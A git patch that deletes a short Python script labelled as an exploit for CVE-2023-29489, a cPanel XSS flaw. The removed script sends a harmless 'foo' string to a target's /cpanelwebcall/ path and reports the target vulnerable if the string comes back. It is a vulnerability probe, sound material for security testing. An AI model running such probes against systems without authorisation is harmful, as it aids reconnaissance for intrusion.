From 6d6920d2b24d4097ad9a1f8bb1c58b5d242537cb Mon Sep 17 00:00:00 2001 From: htrgouvea <10741284+htrgouvea@users.noreply.github.com> Date: Wed, 8 Jul 2026 09:23:54 -0300 Subject: [PATCH] Delete exploits/CVE-2023-29489.py --- exploits/CVE-2023-29489.py | 30 ------------------------------ 1 file changed, 30 deletions(-) delete mode 100755 exploits/CVE-2023-29489.py diff --git a/exploits/CVE-2023-29489.py b/exploits/CVE-2023-29489.py deleted file mode 100755 index 83bf0ee..0000000 --- a/exploits/CVE-2023-29489.py +++ /dev/null @@ -1,30 +0,0 @@ -import requests -import argparse -import re - -def exploit(target): - payload = "foo" - if not re.match(r'^https?://', target): - target = f"https://{target}" - - try: - response = requests.get(f"{target}/cpanelwebcall/{payload}") - if payload in response.text: - return f"The payload [{payload}] worked!" - return f"The target [{target}] is not vulnerable." - except requests.exceptions.RequestException as request_error: - return f"Error making request for {target} -> {request_error}" - -def main(): - parser = argparse.ArgumentParser(description="CVE-2023-29489 | XSS in cPanel") - parser.add_argument("-t", "--target", required=True) - args = parser.parse_args() - - try: - print(exploit(args.target)) - except KeyboardInterrupt: - exit(1) - except EOFError: - exit(1) -if __name__ == '__main__': - main()